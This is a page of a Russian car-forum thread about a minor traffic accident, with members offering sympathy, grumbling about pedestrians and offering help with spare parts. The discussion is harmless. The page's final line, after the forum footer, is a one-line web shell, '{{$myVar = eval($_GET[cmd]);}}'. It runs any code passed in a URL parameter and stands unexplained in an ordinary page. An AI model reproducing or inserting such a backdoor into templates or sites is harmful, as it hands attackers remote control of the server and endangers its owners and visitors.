+ Ответить в теме
Страница 2 из 3 ПерваяПервая 1 2 3 ПоследняяПоследняя
Показано с 11 по 20 из 23

Тема: Нелепое ДТП


  1. #11
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Держись ! Чтоб усё было нормально !
    песок сыпется....не останавливайтесь на достигнутом !

  2. #12
    Кобрабля 2esco is a splendid one to behold 2esco is a splendid one to behold 2esco is a splendid one to behold 2esco is a splendid one to behold 2esco is a splendid one to behold 2esco is a splendid one to behold Аватар для 2esco
    Регистрация
    27.12.2010
    Откуда
    Moscow
    Машина
    Candy
    Сообщений
    2,288
    Сочувствую и понимаю! В последнее время общественный транспорт че-то хочет от ГТИ(((
    Провокатор^^

  3. #13
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    мне показалось, еще, что это какое то судьбоносное событие, тот чуваг что с зонтиком был пророком (не афтаром темы), а именно от пророка к пророку. Мол грит я тебе зонтиком пистану, а ты будь внимательней, не суетись, остановись, не ругайся, мол как предупреждение.....и тут нах.....и пешеход пророческий исчез................ Я периодически замечал в разных ситуациях, что каждому событию предшествует определенный знак. Его только нужно заметить и проанализировать, что бывает не всегда просто.
    песок сыпется....не останавливайтесь на достигнутом !

  4. #14
    GTI-Racing zhek13 is on a distinguished road Аватар для zhek13
    Регистрация
    12.10.2011
    Откуда
    planet earth
    Машина
    mk6 gti
    Сообщений
    334
    меня взбесила другая тема, случившаяся со мной вчера, которая часто случается на пеш. переходах в разных видах.

    я, значит, останавливаюсь, моргаю, мол, проходи, а чувак переходящий улицу останавливается и стоит. я моргаю еще раз и показываю рукой, учтиво приговаривая, только после вас. так он разворачивается и идет обратно к тротуару, БЕЕЕЕЕЕЕЕЕЕЕЕСИИИИТ!

  5. #15
    GTI-Racing S@TURN will become famous soon enough Аватар для S@TURN
    Регистрация
    09.07.2006
    Откуда
    мск
    Машина
    vr6 color concept - sold, а4 2.5tdi куатро!-sold, EOS - недопережитиай.
    Сообщений
    3,787
    Цитата Сообщение от VVZ Посмотреть сообщение
    С пешеходами лучше не спорить, пешеход всегда прав. Тупо потому что он слабее полуторатонного автомобиля, причем значительно.

    Так что лучше терпеливо их пропускать.

    Я вот полторы недели пешком походил и отчетливо уяснил, что среди водителей дятлов сильно больше.
    пешеход прав пока жив. хожу пешком, через дороги только бегаю, только на зеленый с большой перестраховкой.
    Оленей у нас и там и там достаточно.

    Цитата Сообщение от zhek13 Посмотреть сообщение
    меня взбесила другая тема, случившаяся со мной вчера, которая часто случается на пеш. переходах в разных видах.

    я, значит, останавливаюсь, моргаю, мол, проходи, а чувак переходящий улицу останавливается и стоит. я моргаю еще раз и показываю рукой, учтиво приговаривая, только после вас. так он разворачивается и идет обратно к тротуару, БЕЕЕЕЕЕЕЕЕЕЕЕСИИИИТ!
    есть такие.



    з.ы. 2 июня была просто нереальное количество ДТП. у меня друг разложился в мясо. еще два ДТП у днакомых. девочка в питере работает на скоряке, был просто бум ДТП с серьезными последствиями.
    NON LIMITUS HOMICUS DOLBOEBICUS
    (нет предела человеческой глупости)

  6. #16
    GTI-Racing Aero330 will become famous soon enough Аватар для Aero330
    Регистрация
    17.10.2011
    Откуда
    Москва
    Машина
    GTI6-35
    Сообщений
    41
    Если ты катаешься по Новокуркино и Химкам,то часто тебя видела..Очень сочувствую.Но,не расстраивайся..Что нас не убивает, то делает нас сильнее..И это тоже пройдет.

  7. #17
    GTI-Racing Prorok is on a distinguished road Аватар для Prorok
    Регистрация
    01.10.2011
    Откуда
    Москва
    Машина
    Мурзик
    Сообщений
    47
    Цитата Сообщение от Aero330 Посмотреть сообщение
    Если ты катаешься по Новокуркино и Химкам,то часто тебя видела..Очень сочувствую.Но,не расстраивайся..Что нас не убивает, то делает нас сильнее..И это тоже пройдет.
    Да, я живу в куркино. Почему я тебя не видел? :)
    Да, выводы я точно сделал определенные.

  8. #18
    GTI-Racing Aero330 will become famous soon enough Аватар для Aero330
    Регистрация
    17.10.2011
    Откуда
    Москва
    Машина
    GTI6-35
    Сообщений
    41
    Да,живу в этом районе,поэтому и дома на фотке показались слишком знакомыми. Машина просто у меня всего 4 месяца,вот и знакомлюсь со всеми безумными джидаями потихонечку.

  9. #19
    I место Самые Интересные Диски 2011 White pony is just really nice White pony is just really nice White pony is just really nice White pony is just really nice White pony is just really nice Аватар для White pony
    Регистрация
    18.05.2010
    Откуда
    Москва
    Машина
    Audi TT RS
    Сообщений
    1,900
    Пророк, я буду в Киеве в июле. Если надумаешь что-то из запчастей оттуда тащить, давай помогу. Готова выразить своё сочувствие в конкретной помощи :)
    If you wanna be rich
    You've got to be a bitch
    If you wanna ride
    Ride the White pony

    Enjoy yourself and fuck them all 0:-)

  10. #20
    GTI-Racing Prorok is on a distinguished road Аватар для Prorok
    Регистрация
    01.10.2011
    Откуда
    Москва
    Машина
    Мурзик
    Сообщений
    47
    Цитата Сообщение от White pony Посмотреть сообщение
    Пророк, я буду в Киеве в июле. Если надумаешь что-то из запчастей оттуда тащить, давай помогу. Готова выразить своё сочувствие в конкретной помощи :)

    Спасибо большое, надеюсь к июлю все ббудет сделано и гольфец вылечен

    Добавлено через 2 минуты
    Цитата Сообщение от Aero330 Посмотреть сообщение
    Да,живу в этом районе,поэтому и дома на фотке показались слишком знакомыми. Машина просто у меня всего 4 месяца,вот и знакомлюсь со всеми безумными джидаями потихонечку.
    у тебя красный мк6 ?
    Последний раз редактировалось Prorok; 05.06.2012 в 22:20. Причина: Добавлено сообщение

+ Ответить в теме
Страница 2 из 3 ПерваяПервая 1 2 3 ПоследняяПоследняя

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}